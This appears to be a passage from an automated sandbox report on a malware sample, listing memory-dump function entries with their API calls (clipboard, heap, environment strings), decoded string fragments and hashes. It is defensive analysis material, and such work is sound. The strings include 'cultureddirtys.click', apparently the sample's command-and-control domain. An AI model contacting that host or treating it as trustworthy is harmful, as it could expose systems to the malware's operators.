                          • RtlFreeHeap.NTDLL(?,00000000,?,0043EF01,?,0040B5E1,00000000,00000001), ref: 0043D43E
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 4daef5b6ed35b562b1c990082d6d47a5a171f673cd63196ded17d62ff1805de2
                          • Instruction ID: a25689e2d052caa935b9170849c61ee6e5dc1551c885265e18347b9850a6da0a
                          • Opcode Fuzzy Hash: 4daef5b6ed35b562b1c990082d6d47a5a171f673cd63196ded17d62ff1805de2
                          • Instruction Fuzzy Hash: DDD01231555132EBC7101F15FC16B873A54DF0A321F070462B5446F0B1C674DC519BD8
                          APIs
                          • RtlAllocateHeap.NTDLL(?,00000000,0040883A,?,0040883A), ref: 0043D410
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 64be15dc9b9fa60ff4367870892133a1fd189e42d25cdd893f295977a3f3d5e7
                          • Instruction ID: 7abb61d210cd40f2ebc837c9ca936a111d1e3569400e52468b140bea4252c194
                          • Opcode Fuzzy Hash: 64be15dc9b9fa60ff4367870892133a1fd189e42d25cdd893f295977a3f3d5e7
                          • Instruction Fuzzy Hash: ECC09B31555121ABDA106F15FC05FC67F54EF45351F024056F50467077C770EC51D6D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: !$#$#$%$&$'$'$)$)$)$+$+$+$,$,$-$-$.$.$.$.$/$/$/$0$1$3$3$5$7$9$:$;$=$=$>$?$?$A$B$D$D$D$E$E$F$G$G$I$J$L$M$M$N$W$Y$Z$^$`$a$b$b$b$c$d$e$e$f$f$k$n$o$o$p$p$r$u$y$|$}
                          • API String ID: 0-499542340
                          • Opcode ID: ec99b2b2795cbb4344a55b48e8f125dad34b2f24709b2feb5da6528b336e76f3
                          • Instruction ID: 37916e465bb23c59d57fdc821f24f4913477d981b86dd659dfd91eb10b080a64
                          • Opcode Fuzzy Hash: ec99b2b2795cbb4344a55b48e8f125dad34b2f24709b2feb5da6528b336e76f3
                          • Instruction Fuzzy Hash: 0403E03150C7C18AC3349F38884539FBFD1AB96324F188B6EE5E9873D2D6B885868757
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: %$&$,$-$0$1$2D69C26FE306D42DBC3F28D12F61E48B$3$4$4$5$6$7$8$8$;$;$<$=$=$B$B$B$C$C$D$H$H$J$J$K$K$M$N$O$P$P$Q$Q$R$S$T$T$U$V$V$X$X$Y$Z$[$\$\$\$^$_$_$_$c$c$cultureddirtys.click$d$f$f$f$h$i$i$k$l$l$l$l$m$n$n$r$r$s$s$u$u$v$w$x$y$y${$|$|$}$~
                          • API String ID: 0-3687749958
                          • Opcode ID: dc29f9c1eedaba7f815aa351f6f603309ef6c3e347e92a45d930aef5149db11d
                          • Instruction ID: 2d507b8b3a00dfe39267ba81057b2953a598beefa9d101ab2f8ee89295f11557
                          • Opcode Fuzzy Hash: dc29f9c1eedaba7f815aa351f6f603309ef6c3e347e92a45d930aef5149db11d
                          • Instruction Fuzzy Hash: D6220E1190C7EAC9DB32C67C8C0979DBEA11B23224F4847DDD0E86B2D3D6790A85CB66
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: $!$"$"$"$"$"$%$&$'$)$,$-$-$-$/$2$4$5$6$:$;$;$=$=$F$H$P$Q$S$U$U$U$X$\$^$`$a$c$c$e$e$g$h$m$n$v$w$x$z$|
                          • API String ID: 0-3626050199
                          • Opcode ID: 65c6563e2eabac05e39d757a47caa7d14d77d1258a093da204e2dab90ae6810d
                          • Instruction ID: 52197e9dfb1b3d4bd5ebed04cdc8e402f22a0ee503ec71cf898a23ea6b3ce322
                          • Opcode Fuzzy Hash: 65c6563e2eabac05e39d757a47caa7d14d77d1258a093da204e2dab90ae6810d
                          • Instruction Fuzzy Hash: 04A2BF7160C7D18BC335CA3C885439EBBD1AB96324F184B6EE8E98B3D2D6788845C757
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: $#$#$$$'$)$,$-$.$/$1$1$3$4$;$;$<$=$@$@$@$B$D$F$H$J$J$L$N$P$R$T$V$X$Z$Z$\$]$^$b$d$e$g$i$n$t$t$z$|
                          • API String ID: 0-3928828129
                          • Opcode ID: 4ad8651241e16dbfcf0c9acec7b1b64277546e3bf793181a312d5869433c5eb9
                          • Instruction ID: e30a54acdedb43f8eee129d518dd75d18b07f07d9a3902bb8d47857e251e627b
                          • Opcode Fuzzy Hash: 4ad8651241e16dbfcf0c9acec7b1b64277546e3bf793181a312d5869433c5eb9
                          • Instruction Fuzzy Hash: 32223E209087E989DB32C63C8C487CDBEB15B67324F0843D9D1E96B2D2D7750A86CB66
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: $!$"$$$&$.$0$0$2$4$6$8$:$<$<$>$>$@$B$B$B$C$G$G$H$M$O$Q$R$S$U$W$X$^$^$_$j$|
                          • API String ID: 0-2149627891
                          • Opcode ID: 730ad8987f53418f14648a5a6b25224b983cd8224231e815b5e9ab825efb5515
                          • Instruction ID: 16e4426fae9874c56575744c78141763847b3d8a3ccfb18cc28ce99ffc56b2da
                          • Opcode Fuzzy Hash: 730ad8987f53418f14648a5a6b25224b983cd8224231e815b5e9ab825efb5515
                          • Instruction Fuzzy Hash: 3EE1CF31D087E98ADB26C67C88043DDBFB15B56324F0843D9D4A8AB3C2C7B94A46CB56
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$A$A$C$C$C$Q$e$g$i$k$o$u
                          • API String ID: 0-40470204
                          • Opcode ID: 06cd44d294c13ce9531f78a20d59c4b2a525e99f8e05c5b885ded6178d5df9a1
                          • Instruction ID: c10ac864b138def3bf95dbedbc0d4832f234108f875dc2a5cfef2a4e6f2bd5ef
                          • Opcode Fuzzy Hash: 06cd44d294c13ce9531f78a20d59c4b2a525e99f8e05c5b885ded6178d5df9a1
                          • Instruction Fuzzy Hash: 2491E62254C7D14AD3158A3C884435BEFD21BE7224F1DCAAED4F5973C2D5AEC90A83A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 'j7h$+r>p$2v6t$2xB$3A2C$5QRS$8E'G$=]#_$>n<l$z`gf
                          • API String ID: 0-2000455238
                          • Opcode ID: 50898734459a215359d9898fb5530acfe52cd2530e2e3a2e2c25f9c137dd0af4
                          • Instruction ID: 8e50c2f0ea1f6845ec0090da7dd08f27c4872ff8a3a3d82bada98734c817426a
                          • Opcode Fuzzy Hash: 50898734459a215359d9898fb5530acfe52cd2530e2e3a2e2c25f9c137dd0af4
                          • Instruction Fuzzy Hash: BD0202B5E04204DFDB18CFA9DC92BAEBBB1FB45304F15806DE541AB3A1D734A812CB94
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00416CA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID: /sA$^\
                          • API String ID: 237503144-113726921
                          • Opcode ID: 2da563f0e2060f7682f4ef93ff72d2c3ba901c6788d8915bd3d019031bcfb6c5
                          • Instruction ID: 47852da8b4363b37997c9a3fdba9efedb8659700efe5e90bde95f7721ad1d789
                          • Opcode Fuzzy Hash: 2da563f0e2060f7682f4ef93ff72d2c3ba901c6788d8915bd3d019031bcfb6c5
                          • Instruction Fuzzy Hash: 0982ED75200701CFD724CF29C8917A2B7F2FF9A310B1A896DD9968B7A5D739E842CB44
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: )R P$,J?H$/^>\$2N L$6Z6X$q$q
                          • API String ID: 0-1392680054
                          • Opcode ID: 54f63a03ad6fbe38765255c4880f35ca4f8c1d031e0356416910e5c3cd2b2214
                          • Instruction ID: 06939293d696cf48edc9c866a293eca4d1e9f433faf44d9e4e0afd8f21a3e00b
                          • Opcode Fuzzy Hash: 54f63a03ad6fbe38765255c4880f35ca4f8c1d031e0356416910e5c3cd2b2214
                          • Instruction Fuzzy Hash: 541234B2900215CFCB14CF69C8915EBBBB1FF4A320B19856DD856AB352D338A942CBD5
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: Clipboard$CloseDataGlobalLockOpen
                          • String ID:
                          • API String ID: 1494355150-0
                          • Opcode ID: c7b56344ecfe322a79ade127bdafa7707e097675e5f64e58ede00c47f4c82a42
                          • Instruction ID: 4baeb6e306746a3e272314401915990cb5fee85de7cf105a9658a6ff921a20f4
                          • Opcode Fuzzy Hash: c7b56344ecfe322a79ade127bdafa7707e097675e5f64e58ede00c47f4c82a42
                          • Instruction Fuzzy Hash: 9A41D3B0908782AEDB01AF78D58935EBFF0AB06304F06853ED49987242D77D9459CBD7
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004248BA
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0042493C
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID: 2JB$GD$_q
                          • API String ID: 237503144-1507879037
                          • Opcode ID: da33318a7a743e3c09c490f052999c537aac1edadb12bb3997c655bd85d8ee67
                          • Instruction ID: 645d6858e5cc2ff3ca1e1f2afa1359317a52b722a995141bc4bf64d2712732ee
                          • Opcode Fuzzy Hash: da33318a7a743e3c09c490f052999c537aac1edadb12bb3997c655bd85d8ee67
                          • Instruction Fuzzy Hash: 427102B564C3509FD310CF24E88076FBBE0EBC6705F05493DF9999B281D7B9980A8B96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: =$BA$c$eMOF$r$rrp|
                          • API String ID: 0-292436732
                          • Opcode ID: 216e9b0c30a2e8b6d4ecf1aaa30ecb9b097f87b278e46452b0acd07dd4603ad5
                          • Instruction ID: 593da3a24b24698acd308230021430daba89a9387af62b725af4abf13776ee22
                          • Opcode Fuzzy Hash: 216e9b0c30a2e8b6d4ecf1aaa30ecb9b097f87b278e46452b0acd07dd4603ad5
                          • Instruction Fuzzy Hash: 10B1E47154C3918AC312CF7A885076BFFE1AFD7644F0849ADE4D09B3C2D6798906C796
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: s%}$(w/q$b`af$mo$~m
                          • API String ID: 0-3902129397
                          • Opcode ID: 3e8571fb155354bbedcace902f23ebdd9fbb183982d035b371f64f7ff6dca5cf
                          • Instruction ID: 75df917b3e65b6834e2e45e2b851160fa374b79e490a59220d6594e49e11abcc
                          • Opcode Fuzzy Hash: 3e8571fb155354bbedcace902f23ebdd9fbb183982d035b371f64f7ff6dca5cf
                          • Instruction Fuzzy Hash: 00D12571A083218BD724CF24D85136BB7F1EFD1324F188A2DE8D59B391E7799801CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: _9Y$#230$FG$cultureddirtys.click$^\
                          • API String ID: 0-1026204680
                          • Opcode ID: 8570ac85f7d954d9c9f08bd09b179bb29108199b095ca0bd970a0471d83dd573
                          • Instruction ID: be0bfa0685a7da2d55774637929e4c4b1729734ddf3faaa17f3e57d2b70ef87b
                          • Opcode Fuzzy Hash: 8570ac85f7d954d9c9f08bd09b179bb29108199b095ca0bd970a0471d83dd573
                          • Instruction Fuzzy Hash: 599102B150D3D18FC7308F6894957EBBBE1EBD6300F184A6DC4C99B292D7798846CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: (LmB$;T"J$pQv$x~$|r
                          • API String ID: 0-2583321700
                          • Opcode ID: 7b864c6aae007784629b65dd6e7eacb42c58df5e12a028910d3953efeabdbc85
                          • Instruction ID: f0017da262b89747ca0cff466f1857eea50eb127e1dd4b5b3c6b3bc208b63379
                          • Opcode Fuzzy Hash: 7b864c6aae007784629b65dd6e7eacb42c58df5e12a028910d3953efeabdbc85
                          • Instruction Fuzzy Hash: EB7154B5A4C3118BD704CF66CC9126BB7E2AFD6304F18886EE5C08B385E638D945CB4B
                          APIs
                          • FreeLibrary.KERNEL32(?), ref: 00419527
                          • FreeLibrary.KERNEL32(?), ref: 00419569
                            • Part of subcall function 0043EF30: LdrInitializeThunk.NTDLL(00441CF0,?,00000018,?,?,00000018,?,?,?), ref: 0043EF5E
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: FreeLibrary$InitializeThunk
                          • String ID: OL
                          • API String ID: 764372645-1230130318
                          • Opcode ID: e7b3f23fd9f129034ea419355190146c35f97e9ebf0f35e15bd5a3bf3c9f86c7
                          • Instruction ID: 2921dfb3648eadb1fb5a2bd0f422dbd156896aa213f1334e34c69986e783137d
                          • Opcode Fuzzy Hash: e7b3f23fd9f129034ea419355190146c35f97e9ebf0f35e15bd5a3bf3c9f86c7
                          • Instruction Fuzzy Hash: AD622874608340ABE7148F25DCA0BABB7D2EFC5314F29862DE4D5573E1D338AC958B4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: C@@F$S"(w$S"(w$f
                          • API String ID: 2994545307-951073959
                          • Opcode ID: 13429046e819fe00b5a247e5134bf8e1a49da05aae35e2d4abce8e2c1907e5c7
                          • Instruction ID: ab3858e7faeb87dd15824850e8a841b67236376ab17a29e09e546ceb0bf8f4f3
                          • Opcode Fuzzy Hash: 13429046e819fe00b5a247e5134bf8e1a49da05aae35e2d4abce8e2c1907e5c7
                          • Instruction Fuzzy Hash: B232F471A093519FC724CF29D88061BBBE1ABC9314F199A2EF8A5873D1D774EC05CB86
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042946F
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00429572
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID: L(B
                          • API String ID: 237503144-2538666948
                          • Opcode ID: bba0173f18c7919e26010ccb7f5302b0829f2fc74b18e853c1c27d981b4fca87
                          • Instruction ID: 5089139378cce42d4bca66f2117e6992a67c1d470447ec800a7f4af1c2198a72
                          • Opcode Fuzzy Hash: bba0173f18c7919e26010ccb7f5302b0829f2fc74b18e853c1c27d981b4fca87
                          • Instruction Fuzzy Hash: EF8123B6A183109FD314DF64D84076BB7E1EBC5300F45893DE99497395EB78EC428B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 2JB$z`gf
                          • API String ID: 0-4132974888
                          • Opcode ID: 65d86abc0e24293b913f9ed6221dbdbd12f9cef3da82b62195cc45a6b8c2e634
                          • Instruction ID: 3783604cee78ff1ebcab31f7680652aef326075228794581e063b6509aad2af3
                          • Opcode Fuzzy Hash: 65d86abc0e24293b913f9ed6221dbdbd12f9cef3da82b62195cc45a6b8c2e634
                          • Instruction Fuzzy Hash: D951057120C3409BE324CF68EC41BEBB7E1EBC6314F10497DF69987281D7B994068B96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: #`af$GDEJ$tyy~$y/
                          • API String ID: 0-1018404746
                          • Opcode ID: eb34c8398df95aa2b667f457be915dfb5064699668c929a9d115f6003ce403de
                          • Instruction ID: a44d1e5486a3d4f0f470752214a74be919ce51612e42c25dc9d10f1c1679759e
                          • Opcode Fuzzy Hash: eb34c8398df95aa2b667f457be915dfb5064699668c929a9d115f6003ce403de
                          • Instruction Fuzzy Hash: C2E102716083508FC724DF68D891A6BBBF1EFD5314F04882EE9968B391E778E805CB56
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: "#$./$4.$<G
                          • API String ID: 0-297906750
                          • Opcode ID: 04b2b48e7ce9c77c9e4e8abf10a1b664874e8fdcf5240be40adf13479abe39b9
                          • Instruction ID: d3e774dd982b0f0a7d135b27205e798afb8bdb41bd649d6984aa11880ad8d42d
                          • Opcode Fuzzy Hash: 04b2b48e7ce9c77c9e4e8abf10a1b664874e8fdcf5240be40adf13479abe39b9
                          • Instruction Fuzzy Hash: 728115B6A1D3908BD3308F24D8417ABB6B1FFD2304F44592DE4C89B355EB788945875B
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: D$Jc]]$Vw'q$`C}
                          • API String ID: 0-3592151173
                          • Opcode ID: 2f204a7c25fa17a035015cbf3063fb4c547d52e5e3e9bcec3ca731518ccee344
                          • Instruction ID: 80fec91d28a02620f52b89747ee1bc21499922621add6e12ceeb047b7f690585
                          • Opcode Fuzzy Hash: 2f204a7c25fa17a035015cbf3063fb4c547d52e5e3e9bcec3ca731518ccee344
                          • Instruction Fuzzy Hash: 525112B45083848AE3348F51C8A575BBBF1FF92748F14881CE6D96B394C7B98449CF46
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: &//%$./$8~9*
                          • API String ID: 0-1900518885
                          • Opcode ID: d251255226fed3a2bbaf018731607024951e33a62e39a53fe2014d2b3a856639
                          • Instruction ID: 7e828cff6f1866cb6ceafffe31b0a9e734eff1e2ebeadeab8fd10560032b6d28
                          • Opcode Fuzzy Hash: d251255226fed3a2bbaf018731607024951e33a62e39a53fe2014d2b3a856639
                          • Instruction Fuzzy Hash: C0F114B560C3918FC7108F24E89126FB7E1EF86304F48487EE8C597352DB39E9468B56
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: C{Tu$`W`Q$k[dU
                          • API String ID: 0-2853931809
                          • Opcode ID: 9fade3dc6d3f69c14709735b4eb87b70a9edbbd03f498eb7c730186ee3d4522b
                          • Instruction ID: 8d5332dc80a962bbfe09d2b1709603d92ffdbaac0a9cb6c207c614a35ed25dcd
                          • Opcode Fuzzy Hash: 9fade3dc6d3f69c14709735b4eb87b70a9edbbd03f498eb7c730186ee3d4522b
                          • Instruction Fuzzy Hash: 4F1298B9200B00CFD7248F25D891BA7BBF5FB46314F048A2DE5AA8BB91D778A405CF55
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$#$2D69C26FE306D42DBC3F28D12F61E48B
                          • API String ID: 0-3949052905
                          • Opcode ID: eb123670cfe2356f5c9b7d50deb5c900c88ad470cbcc8e02cde2a012f66dc941
                          • Instruction ID: d2c3a75e3e13cec461adec4937d8dfa8a09ae57b96e8792ae721715be1112e59
                          • Opcode Fuzzy Hash: eb123670cfe2356f5c9b7d50deb5c900c88ad470cbcc8e02cde2a012f66dc941
                          • Instruction Fuzzy Hash: 83C15972B087404BD318CF35885166BBBE6EFD5314F18893DE5E59B382D638C906CB86
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: 1;9=$A$H
                          • API String ID: 0-721592554
                          • Opcode ID: 4bc7f390f73922318371c0e4a299c528f4a6c2b82fdd5cb30266293248720e71
                          • Instruction ID: 7a4237af44a0ae105f6d3f018af1c291b523e1a2260fa316319f0a43e075367d
                          • Opcode Fuzzy Hash: 4bc7f390f73922318371c0e4a299c528f4a6c2b82fdd5cb30266293248720e71
                          • Instruction Fuzzy Hash: 10B1F57168C3914BD314CF28949126FBBE2EBC2314F18993DE4E56B781D739C90A8B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: As<V
                          • API String ID: 0-2778774387
                          • Opcode ID: 51b95f6f9e7c7d6584e6c93e3edfbfd48b37412cc392697d5226b142e76c4062
                          • Instruction ID: 770a1a868b74db578ff128ba571692d3a5ceb2514abfc68fb9e4d3c288c02c02
                          • Opcode Fuzzy Hash: 51b95f6f9e7c7d6584e6c93e3edfbfd48b37412cc392697d5226b142e76c4062
                          • Instruction Fuzzy Hash: A7322975A04B408FD714DF38C985396BBE2AF95310F188A3ED5EA873D1E638E845CB46
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: );02$2+)E$>811
                          • API String ID: 0-1216679826
                          • Opcode ID: 517b75604a2ab78f69a80f283479f54c4d28ada67fb53a22893818abcbf77ab7
                          • Instruction ID: 895a1d6095f4adbd9659d21989b613ed85b61945608e74aa1ccb024d85546fc6
                          • Opcode Fuzzy Hash: 517b75604a2ab78f69a80f283479f54c4d28ada67fb53a22893818abcbf77ab7
                          • Instruction Fuzzy Hash: 86D19DB4900B419BD324EF39C5567A3BFF1AB46300F144A2ED4EB4B786E7346049CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: &'$S+P%${/I)
                          • API String ID: 0-651705516
                          • Opcode ID: c586df6937c7497ae987251f12a17f44eb6b469253912f9a2e95eec746e354b2
                          • Instruction ID: 53ab21980dad4e9de9e7434d17dea19c69fe8dc141d63f46f3eecfe4ee9f73c3
                          • Opcode Fuzzy Hash: c586df6937c7497ae987251f12a17f44eb6b469253912f9a2e95eec746e354b2
                          • Instruction Fuzzy Hash: 63A17C72A183218BC314CF28D89126BB7E1FFD1314F198A2DE8C99B385E7789905C7C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: J]$sG$tw
                          • API String ID: 0-669861854
                          • Opcode ID: c5ebd8142ae6c4f25f0e20b3b204bf8b71cf083f4e55ce5da69aca37a62cbd33
                          • Instruction ID: c2d2dcb9fa484b7607a35e14c546a9793bafb6900113ea597638cef1f47e385e
                          • Opcode Fuzzy Hash: c5ebd8142ae6c4f25f0e20b3b204bf8b71cf083f4e55ce5da69aca37a62cbd33
                          • Instruction Fuzzy Hash: 41B18CB4605700CFCB28CF24C4E1663BBB1FF56304B29859DD8964F39AE778A846CB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID: Q$R$S
                          • API String ID: 0-2159227449
                          • Opcode ID: fa2d0f4803f636711a63f8fa08e82bf40574286d51e486e904df9e5508a482d5
                          • Instruction ID: 85c6e2e90ca5436811f37888b4c5b61135e88fe2c84abc5dc9c63866ef0d9ac9
                          • Opcode Fuzzy Hash: fa2d0f4803f636711a63f8fa08e82bf40574286d51e486e904df9e5508a482d5
